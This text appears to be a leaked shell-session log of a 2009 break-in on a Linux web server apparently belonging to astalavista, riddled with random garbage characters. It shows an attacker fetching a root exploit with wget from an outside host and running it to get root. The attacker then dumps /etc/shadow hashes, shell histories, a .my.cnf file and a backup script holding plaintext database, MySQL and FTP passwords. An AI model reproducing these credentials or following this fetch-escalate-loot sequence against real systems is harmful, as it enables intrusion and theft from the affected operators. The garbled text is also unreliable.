! i9 M$ `  f  ]) C2 J4 S0 {) |
sh-3.2$ uname -a
' M: x! c. d- a7 g; K+ fLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- W' N! @0 {& g; Z0 Q, v) ish-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]  J7 s7 _+ f6 ~. z* `6 t
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]) a; T( r1 e+ v3 v9 H2 K" c
Resolving anti.sec.labs… 13.33.33.37; I6 E  L0 L/ s4 m; A. A8 ?& y! ~" v+ ~# t
Connecting to anti.sec.labs|13.33.33.37|:80… connected.# \; U8 C- H. ]! b+ c8 K5 h5 f
HTTP request sent, awaiting response… 200 OK7 W. [% U) Z; s3 X7 k/ B8 `) F$ B: _, [
Length: 18200 (18K) [text/plain]
9 B8 Y  a* @+ n% g% gSaving to: `g0troot’
5 r9 w/ ^) ]2 c) n# _( _' U6 G3 l# E8 o0 }! a' [
100%[=========================================================================================================================================>] 18,200      58.6K/s   in
" H/ `9 e: z$ l( t2 I3 d- S0.3s
8 s+ _# {9 W+ Z
1 d2 R/ h) M) `18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]9 A; t% B- X* m$ T
$ H$ k4 c# X8 P: S
sh-3.2$ ./g0troot -i x86_64
+ Z: p, l, w1 ^  v3 N0 H[+] g0troot - anti.sec.labs3 i% K( s' V  E% l$ l
[+] Target: 2.6.18-128.1.10.el5# a7 Q# k, S! K. I3 W0 W  V) F9 v
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]: v1 L/ {" p! j0 }. B1 p
6 {" n% Q. h: v( p0 T8 D; w" |
[+] r00tr00t3 H1 X& T- z4 t, a6 H, V
[~] Executing shell…
' ?7 Y4 @5 _& ?- i+ g# U2 J. [8 r/ R4 U  k' }
sh-3.2# id
; s$ _2 s" _% m4 Tuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
4 q5 t1 b2 ]' n- P/ [6 I) ^# {4 v/ T* Z- Y; K
sh-3.2# cat /etc/shadow
% l- A* p: z" v" e+ h% a( ^/ c* }root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
! V& F+ q3 `6 h5 N+ N/ m" @[snip]& A% p/ L- V) t
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::8 O% l! F) y: W' @' a, x
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::0 I. K1 i# Q: {4 f- J
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::1 D4 j! A. j6 ~) F0 U
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
, G0 Y- u' X7 I2 S8 O# E9 |+ G9 }7 W% z. U/ q
sh-3.2# cat /etc/motd, [/ w0 l2 Y4 L
#####################################################
, e3 ?  @- Z5 e" Q#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #: @  x& o3 F% [$ W
# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #8 Y6 r9 C" I+ X$ }, @$ U$ ^% F
# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #/ J8 n# X" b* ~$ a' @% g) z# C, ]
#                                                   #
8 B/ u/ Z6 b5 n% F8 b: x#####################################################
- m" {4 Z! {/ ~& n% ~) ?#                                                   #
# `, v0 D1 {* H8 F# ?# Admin Contact - 链接标记support@secureservertech.com      #9 a, z: M+ k/ N, O
#                                                   #3 ~+ R: }" L7 h$ q
# Available ShortCuts                               #
: v3 A( H. D5 m; N+ m5 |+ ]#                                                   #
# B; A7 X+ y  X4 F# nst -  list active connections                    #. t+ Q9 a7 v# H$ N! R* v
# ddos - shows how many times each ip is connected  #
/ V/ d5 f6 }2 Y% _' W  p- ~8 X# ltr -  restart the webserver                      #/ @# z2 C/ E% Q& R% f% H; t
# phpc - edit the php config file                   #
; {" u* h# q9 Z% O& R( z, @# htc -  edit the webserver configuration file      #" I( n2 w- _5 _% z% a2 W' m
# up -   uptime                                     #
: ]& z) a0 z0 H- {% J% N3 X# etd - edit the motd of the day file               #7 O0 p& E) o- s2 \, I1 e$ E3 \
# htr - start and restart apache if needed          #; W2 `; r" S  y0 o- h: f6 W
# syng - shows active SYN_RECV connections          #
9 T; u* b) y3 w- t# synd - syn flood blocker - “synd -h” for usage    #3 V2 u4 t& S) e% R, O7 x4 Z1 `
#####################################################
6 c8 j, S- u# T6 `- L4 p+ G9 `# NOTES:                                            #7 }2 J9 I/ i" F8 G  t
# Last Upgrade - 12-08-2008 by JF                   #
$ C& d3 K' V/ ^2 w: {: W# My.cnf/Mysql Optimization - 1-28-09               #
3 S) M1 }; i4 F! x! K6 A4 y4 n#                                                   #
: l; k! E1 z5 u/ U5 ?9 |#                                                   #( Z# Y; T2 f3 v+ x" q
#                                                   #: H: [0 d: ^5 N# u' ^+ |
#####################################################
: p* }* U" m1 N# T5 U2 y# Y$ ~  [+ o
sh-3.2# lastlog | grep -v Never
. N  G8 J! V; @) @Username         Port     From             Latest% q0 y% C6 F) D  q, Q
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009* n; w2 }  Y# Q; ^
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
9 [8 g# x, t, `! }0 c9 k4 hcom              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
( a# r1 q2 U, P- {: _3 Fastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20091 h# a3 ?  J( L$ a9 X0 i) p+ m

5 |! [. V. q0 }9 Z2 Fsh-3.2# ls -la, h# b  L+ m8 ~! |  S1 d
total 453376$ D5 Y; U, \) V
drwxr-x— 15 root root       4096 Jun  4 08:40 .7 j; @; e* u$ X  }! R
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..# B4 }$ X: N! S
-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip1 z4 N6 n8 v! a( y
-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg. R  h3 ^& Q, z+ t
-rw——-  1 root root      16836 Jun  4 07:21 .bash_history
  ]. A9 C6 k0 S6 C6 t7 Y$ ^-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout
' z  z  V( [5 S" Z/ D0 A-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile$ ?/ f4 x, t4 n6 M' k- O
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
0 _: {6 ~( @) c% b1 a' F-rwx——  1 root root       1899 Oct 28  2007 bk.sh
( E3 L6 I' z( B* ?* u/ L2 c-rw-r–r–  1 root root       1327 Nov 29  2007 cert, J; W" M( G  z+ U- G% P
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
0 v8 [# y+ \/ [2 `" Mdrwxr-xr-x  4 root root       4096 May 20  2008 .cpan
3 H" J9 [2 D% b4 n; c' c8 ]-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
7 m! o3 G, F$ z5 h) h-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
) S3 n) Q7 \+ m( P. H) G) o. edrwx——  2 root root       4096 Oct 28  2007 .elinks
; W% d2 t: I1 U& k, Q9 t( edrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1- ]" w" ?! D/ g* o/ B$ W7 O9 G
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
2 ~" D% i+ x8 g/ R-rw——-  1 root root          0 Apr 16 13:19 .history
- z) ]* A% O! }2 k: d. E8 A-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
+ E5 m7 s5 F, c* F8 s5 K' L-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog% E: x* I" ]' c
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
  F; o1 W+ P1 S8 D0 }1 i1 I6 N  g-rw——-  1 root root         35 Jun  2 14:23 .lesshst
% T7 F" \3 U9 Hdrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp1 a  p. ~; W+ N2 _
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
  Z3 s( w" S4 F+ E4 k. y  g-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
* [+ c* {; Q$ Y1 G4 D! J& D-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2/ M5 i+ ~0 e' u% _3 \5 _
-rwx——  1 root root        760 Sep 18  2008 lp
7 z  _4 w5 s  f3 f6 M/ Bdrwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1  l% v$ `1 e7 m! j. I
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz: v, h# e# I! S' {! V1 Q  w
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
5 a$ O& w6 [( u6 x$ M9 C! Pdrwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9; z$ {; G  w: ?, \% Q% W6 L
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz4 t- j& [1 z8 }6 b
drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
" M4 L# P: Y5 o, O( {-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
( i* v* m+ {% h* q7 t% _-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh# {4 D0 f4 K6 H) G2 u4 \
-rw——-  1 root root         41 Oct 19  2007 .my.cnf' D# b0 q: z$ q0 z
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history, G1 O2 g( b3 J! L% I- m3 l
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport0 ~% A$ K( D2 F! Z( l
-rw——-  1 root root         41 May 20  2008 .mytop6 J" a9 {5 T7 A( N# X! i
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6( ?6 _( k' M- r- g8 m' z
-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
( a7 p( D' t; O5 Y, A; W, zdrwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp- [0 U; C# b3 C5 s/ _
-rw——-  1 root root       1462 Sep 21  2007 opt.php
3 B6 F+ L* S( J9 C( R: m  L-rw-r–r–  1 root root       3371 Sep 22  2007 p! ~6 v, V8 f: y9 a( L2 [
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2/ z4 G( m) j5 |# B. W+ P
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
2 D# ], \6 R5 g  [-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
2 v3 _7 v. h4 v7 U/ q-rw-r–r–  1 root root        887 Nov 28  2007 server.key5 R: p) Q. Y* j2 t+ b
drwx——  2 root root       4096 Oct 10  2008 .ssh% v0 R0 i, D: h" e1 f1 `( q' B4 I( ^
-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
7 c- x0 N+ }3 t4 |: v-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
- C% N0 f) R/ s% M- [-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
0 b, s6 w5 I2 U4 c1 m-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1
/ P$ L/ t9 ?7 M# U: jdrwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
. ^! U* [- b9 `  s2 i& J-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh8 [; c9 w' g( B% I% Z
drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0- e$ N. C+ R- f5 ^+ t
-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
) R6 |3 Y* o0 d4 U+ c- b; I' |-rw——-  1 root root      12997 May 16  2008 .viminfo! _9 S* f$ N3 ~7 Q* l
# T+ s/ i$ [/ {1 J* K3 v
sh-3.2# cat .bash_history3 _* P) K/ q5 s, J' T: V1 M
[snip]
* {) {, f7 U  `. ^- G3 Hwget cp4sst.com/sstlinux.tar.gz. j( ]6 T% e1 q+ f* i3 C7 T2 s
tar zxvf sstlinux.tar.gz
! U' U7 ~) W) \; v8 w5 ?, ]cd linux-2.6.27.10
5 S, z# ]2 `$ H6 D: j$ ish install.sh
# c% n; d5 A, R! }9 qmake bzImage ; make modules ; make modules_install ; make install) |7 S- t4 c; E% p/ J' Q
make clean1 T" z9 B/ F$ w6 N1 n4 m% q
service mysqld restart' S" m9 _0 H3 P7 C
[snip]
  ?" ~8 e4 s& z# Ycd /usr/sbin// k2 {+ _# U" s- ]- \( `
chmod 4777 traceroute$ W  F* K! C. B* X
chmod 4777 ping
  u3 Y( V' I2 n+ B/ b, ltraceroute -I 链接标记[url]www.astalavista.ch[/url]
! G$ p: f5 V# O! O# D[snip]! z, P2 ?6 o* f3 n7 p0 i- x; y
vi /etc/csf/csf.conf1 f% N$ @8 z. s
traceroute google.ch
7 O6 ~  q& Q: B; V4 T1 vservice csf restart
- o) S3 A+ {7 Z/ Dtracert google.ch" W; J7 a/ M  f+ g7 j" E
service csf restart
, q% ~' J! m+ Ntraceroute 链接标记[url]www.google.ch[/url]/ e3 ]" P- d9 ?4 n
tracert 链接标记[url]www.google.ch[/url]4 O9 n! l2 @* {9 V' Z6 O
traceroute 链接标记[url]www.google.ch[/url]$ a, `$ F  s6 ^0 d" e8 L8 O1 o
locate traceroute4 u) p" ^% k9 e
chown 4755 /bin/traceroute. ?3 T) h: O# P6 @$ `
chown 4777 /bin/traceroute6 f, C1 G  d: q% F! y
locate ping
9 H2 d- N5 Q- g' Gchown 4755 /bin/ping! }: F+ T7 {7 x+ o$ g1 |4 p
chown 4777 /bin/ping7 O4 l: e" E; B2 M% w" z3 _
cd /bin/
+ A  g2 D* D3 r. ils -ali | grep ping
( {! t) c" L6 N: q, Dchown root ping
1 w, b+ Y! `3 `chmod 4755 ping
. w2 [0 m. k5 V% D( M7 tls -ali | grep traceroute. U  X5 T2 @, b. c" k
chown root traceroute
  u/ ~; e9 K- X/ @2 y) echmod 4755 traceroute
4 C8 k5 j/ t/ P. Mls -ali | grep traceroute9 T" _+ L) j! S& m8 t: L
traceroute -I 链接标记[url]www.google.ch[/url], w  `9 E$ m9 i: f- U9 O
traceroute 链接标记[url]www.google.ch[/url]( y; A4 L5 E+ a/ r8 |3 o( T
whois pmsantos.ch
0 `8 }1 g4 H% I, z0 d: J8 o[snip]) k- r7 w6 G2 B6 r
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
; F6 a6 v7 l! x2 a+ R' {mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql1 }' f7 `6 ]# b, }& s/ a% S0 s
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
* ~/ E: l. q# a: S0 O, ~mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
3 Y# I( |: F2 A. stop
! S% S; m+ P% j. k; S& ~# J  vping ssth.ch
! s4 ^$ w2 S; V2 t* _8 U3 mping asdlkfaljgasd???ljg???lasj.ch( U; Q" h7 O. \9 X. P
ping asdlkfaljgasdlasj.ch
2 o2 Q" u7 J  F( q% p7 [ping 链接标记[url]www.ssth.ch[/url]
. H3 j* x0 G) e2 \# {ping ssth.ch) L3 |# T  d) w& r4 G% e& u7 O$ A
nslookup 链接标记[url]www.google.ch[/url]+ y3 H% L  r) |- f8 c: l. B  l* |
nslookup 链接标记[url]www.ssth.ch[/url]* V8 h; Y0 o3 f( F5 \  v
man nslookup4 P+ n6 R; Z" F" J! \
ping 链接标记[url]www.google.ch[/url]
5 P: }+ |! K. {nslookup 链接标记[url]www.google.ch[/url]7 C" s% T2 m2 z7 z' |
nslookup 链接标记[url]www.google.ch[/url]
( `$ W1 ?. l: W2 cnslookup salfjasdlf.ch% _9 J9 j% j' N8 Q9 z3 h
[snip]
# @  Q3 g1 G' t+ z' copenssl passwd -1 sadf3 N" N* I1 f3 m  v# O8 J8 _2 q
openssl passwd -1 5cZNHstdTy
& V: k! K; J" E! f$ f5 cmysql" l3 u4 m+ y; [, x! n
mysql
4 c. a' J( c4 G) y% c9 ]3 olocate proftp$ ]; S$ e' V  ?7 Z/ }9 s% ]
vi /etc/proftpd.passwd
4 G: ]: A; p  Q' q9 tservice proftpd restart* j& C# w$ K/ N: c
locate proftpd.conf
3 T" n* x: k) s; Rvi /etc/proftpd.conf
6 J% o; `. z- f4 `1 o* P5 f0 Ivi /etc/proftpd.passwd+ f) a% y6 P0 t+ `: ?1 B* H% Y
service proftpd restart& @- [6 z0 O4 E
[snip]. ?5 E% h$ E, U$ V) e) V1 o
/bin/sh /home/com/backup_system/backup.sh
; Y8 O3 d( u: Q( star cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
# D! w% J, N' V/ a/ O( \3 umysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
% r" R1 t% e8 w7 u# ^mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
0 R3 E2 U  O/ u, ?4 Fls -ali) W% ]3 s- Z; B' [
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
( E5 a8 m3 V, l! h5 ]# Umysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql- x6 l. E9 z$ b' i
crontab -l" \3 u. F' f2 s/ f1 G: \
crontab -l0 g0 _9 U! G. Z* U/ E+ a. K
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
2 G3 ~+ @  i8 T- x( q3 S, Z/home/com/public_html/modifications/cronjobs/exploits.sh
, N5 k- b) c/ \$ Owget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]% b+ i' |3 O( h
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz* A; C; \6 Y4 M0 r! i
cd lsws-4.0.3# v% z, j; m/ W3 ?, q9 r" M
sh install.sh" H. c- f# ^% K
uptime
& A4 E- t# r+ m; k/ V! X. W* f4 Ehdparm -tt /dev/sda
: @6 R0 R1 @5 {9 a# _iostat, S1 |4 d! p: [, r) e- ?) s
yum install iostat
: e* T  ]- s# E0 o% L" |  t+ r. C- Yiostat/ G( H: A3 \5 ?) o
whereis iostat
, r2 q# v* q: P# m  L" Wyjm clean all$ ~- Y4 x' w) M2 {& |8 O9 D# r
yum clean all ; yum -y update' l3 n* R& J+ E1 Y$ w$ A
iostat
5 w% W! j7 B& nyum install systat6 i& o& @8 ]9 p3 u8 Y/ u( @& v/ L
rpm -qa | grep iostat: R* {4 Q8 k8 W1 o. r/ }
rpm -qa | grep sysstat
7 l; R  u' y. u, N8 m5 M) vrpm -qa | grep systat% n9 j( G# x: ~! p/ w4 f# \1 z# O
dmesg -c
+ ]6 P2 `$ E9 Q$ xsysctl -p
( M, y0 K* `' V$ auname -r5 A7 _& J* ]5 W# a0 g
cd /usr/src7 t) u9 J3 T! B
wget nix101.com/kernels/sstlinux.tar.gz
( }; ~) O7 r5 \shutdown -r now1 ^& n8 v* w* j! k. H7 w8 d
nano -w /boot/grub/grub.conf
5 @: |" o+ X3 f6 X' L8 N; Z  b
. l5 F" {+ i' Bsh-3.2# cat .my.cnf
2 [2 s4 Q: e) N. W# l# E' d, d[client]
8 a7 |# `! G% I# C# R- o( Q0 N: Euser=da_admin7 C) v; w8 e4 K( p+ L
password=X9dctmRH; @5 g  M6 N) I- w& G  P+ S
/ i5 B9 m- W. Q/ M- e
sh-3.2# cat /home/com/backup_system/backup.sh( d- C' T! e& p9 b/ Y8 Z
#!/bin/sh3 J& l1 r  L$ w. j: o
#####################################################################6 ^# {% ?6 T' K9 ^$ w
#                                                                   #
; R' `) N; y8 g# y- D6 E#   incremental backup for astalavista.com                          #
0 X! A1 B8 L% E$ G9 @8 O' F: x#                                                                   #
8 x6 i2 ^& C( [1 E& f" t  K#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
2 k$ n2 {) _  F. f! i' R#                                                                   #5 y3 L) Y& U: O) P$ _3 f
#####################################################################1 Y  K1 I. N& `. i3 N
[snip]
* }7 B4 j* m  o, y- APROG_DIR=”/home/com/backup_system”;) d5 M$ B9 ^, I
BACKUP_DIR=”/home/com/backups”;! J9 t) [) h, [7 g6 l# A
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;! b9 W( L* N! s5 @
# ftp for synology backup server
' X7 d; Y; x5 RFTP_HOST=”212.254.194.163″;
+ F) C6 u) k8 o; O. p0 N( R' U4 TFTP_PORT=”21″;
/ C$ v: Q* X" F% _; _FTP_USER=”astalavista.com”;+ X" K, v# _5 s
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
9 R% q5 o3 z1 Q; ^7 B# _$ RFTP_DIR=”/astalavista.com”;5 |% l9 w% ^8 t& Z. t  l
# database1 k0 n* s& l  _. R
DB_HOST=”localhost”;5 }2 s. T: D- V, ]) k
DB_USER=”contrexxuser2″;# k0 S8 q' L+ f; f5 c
DB_PASS=”0fEYNZgXz1pKe”;- v( _  O/ w, M  E
DB_DATABASE1=”com_contrexx2_live”;
: r' a0 Q4 g7 C! h- X# b, ADB_DATABASE2=”com_contrexx2″;
! J% r; _7 K4 Q+ ?# t0 s% g[snip]
+ m% z" T+ k( k- dftp -in $FTP_HOST $FTP_PORT <<EOF
% E  l+ {" x. B4 G4 lquote USER $FTP_USER2 ^1 a/ ]+ f, d8 z
quote PASS $FTP_PASS; b. I8 _6 c% i2 K5 P1 [
cd $FTP_DIR, f0 b4 w2 x1 F8 N
put $DB_FULLNAME-SQL_Dump.tar
. k$ ?- P; ~8 W5 J6 b! O, `put $BACKUP_FULLNAME-Public_HTML.tar& _5 S, k) c2 o% o/ F7 }
close
- t/ p% ^: E2 F6 Q8 ?- ibye% ^  b* E( \! s8 J7 S7 o2 D) `
EOF9 X' [2 ]" D0 \
0 O( [" h6 Q6 O! n$ K& `
sh-3.2# cd /home$ A4 s: a5 ]+ _
sh-3.2# ls -la  M( J; S% L! ?6 h- D: ~% j
total 1202 T! g$ f; ]8 A) T% }$ h; C
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 ." h3 B4 H1 P3 M; t4 T( ]# f# ~
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
$ G) {( q. y' u! bdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
9 D. a( w  J- s' N-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
) I: o9 L3 f$ U% ?: P-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user( s& q8 {; ^2 l  u( z
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet& {5 x1 Z3 M( ]& T
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup- u+ x2 }8 f+ l# H. S% A5 A* b
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161) h6 a4 X0 K, v
drwx–x–x 10 com     com      4096 Apr 28 12:40 com: U8 h# y* H5 D% h$ S1 a
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp* R% t/ X2 X& `" n) v' P% Z$ `4 E
drwx——  3 jon     jon      4096 Sep 21  2007 jon
5 v  M2 w' ?7 i* ?8 G# g0 Y3 Vdrwx——  2 root    root    16384 Sep 11  2007 lost+found) U8 p/ T1 f& ~5 i6 H; b2 U
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
# n- J9 x( h1 T* R) F3 k: Odrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata$ z5 Q6 |; a4 ?+ T$ Y$ C; K
drwx——  2 jon     jon      4096 Sep 15  2007 test
1 m5 f. T! ^6 g2 ^: G  Udrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
  a* {% |% J3 u" I# S( r. p+ u2 b# T9 J; V! ~; T1 O. {% [
sh-3.2# cd admin
$ w6 z0 j! G1 U5 o) C1 h1 g% Esh-3.2# ls -la
( f4 Z6 K- m' f4 x6 y9 |! [/ n& ftotal 17358962 e6 n8 U! l- G/ {% p
drwx–x–x  9 admin admin       4096 Nov 28  2007 .; [* p+ ~! x) F
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
. ~5 D7 q: ]$ G" `  ndrwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups
4 z& M' T" `( f& B/ F. Tdrwx——  2 admin admin       4096 Sep 28  2007 backups& ]0 o+ k! G- B
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history  q9 h; j5 a  |; ]2 M/ q3 K  |
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout
. M% w5 h+ z; K) {7 |7 T-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile: I) w& A* s) b2 b
-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
$ P+ k. q! o4 U) K5 v/ d! ~- ndrwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups
, \! T! m/ j+ ^( G1 n- N/ O0 w1 Ydrwx–x–x  6 admin admin       4096 Sep 21  2007 domains
) t$ P3 Z8 }* |1 G! h- g* E) ?drwxrwx—  3 admin mail        4096 Sep 21  2007 imap2 P; v  g* D6 Q- F
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
  M- i6 _! M0 }0 p: ydrwx——  2 admin admin       4096 Sep 21  2007 mail3 a1 M$ p2 \# K  Z5 e3 Z
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr
1 \, n, l! s+ v: U8 b9 M) j-rw-r–r–  1 root  root         887 Nov 28  2007 server.key
  C+ W7 n1 ]7 L, F6 e6 y' g% `% G-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
) `) a) E1 g* r* @' S-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz
% D, ]+ {4 {5 w  E7 j' qdrwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups; d4 w+ x1 `1 X/ Q. s
2 n( ~/ N& ^4 a  h/ z) E( Q
sh-3.2# ..4 ]4 l' E0 Q' o9 K/ z- B9 X
sh-3.2# cd jon
+ Q5 {; L: s3 {2 P: |7 S) O" fsh-3.2# ls -la
; J1 S  d0 ?' c# M" jtotal 36" t  O; y: C8 R0 O$ B
drwx——  3 jon  jon  4096 Sep 21  2007 .
0 P" v9 F/ W' p% kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( f* R  G6 C  z: o
-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history/ [- z3 ^9 r( z: U4 O. t1 l* {! `- |
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout/ s# }, C0 Q# Y  g9 }
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
! K: y' A( \4 h6 \- I! `-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
+ Q- h1 E& l$ t-rw-r–r–  1 root root   24 Sep 21  2007 info.php  X5 O: v1 k* E; c
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html+ i: o. ^( \! ~( ?" ^2 R& F
/ j3 _5 u- B+ h3 g- Q- k
sh-3.2# cd ..
0 q" B: p* }/ _" U2 Q8 Qsh-3.2# cd test* G) w# p+ t& N
sh-3.2# ls -la8 n% A8 X2 V' f7 Z" E4 s1 K& W
total 48' U5 m+ \) n: m" T; \2 o. T
drwx——  2 jon  jon  4096 Sep 15  2007 .2 ~5 e0 n( q  }' ~3 q4 A. o
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..- {3 Y, _- v; }7 Z3 i- b2 C
-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
, ]4 m: J2 I* `-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
( C2 s* U7 F4 M. Y3 f- F3 {  U% x0 y- K-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile. D7 p- v% \! L, T  P2 {6 q- t
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc; j: `4 n1 b, u
sh-3.2# cat .bash_history7 W3 h1 i- T" N. h
/usr/bin/mysqladmin -u root password PoliuJhytg670 f  n/ x4 m9 z' _, P& s' D
& @" Y' K, r7 J- N' J+ r% |3 C* N
sh-3.2# cd ..
& p3 N) i, v3 `4 Z; G3 \4 ^sh-3.2# cd astanet
2 g7 p- F+ W) b; N1 l% vsh-3.2# ls -la! g0 a/ n2 f9 }. E- \
total 52
/ c$ s  g8 ~2 j( @. B8 mdrwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .
  g; k$ P" V3 G0 I) Mdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
: N1 B. h' Y) _0 r7 K# n5 O4 Hdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
* w4 N5 Q( J' I2 C2 ^7 m-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history9 J( T2 q( r3 u: s
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
8 ^; Z" c* u* D3 h: ]) ?; L" \-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
% j* D, H5 d, [8 @) g. W: `-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc% i0 z' q, |4 {" A
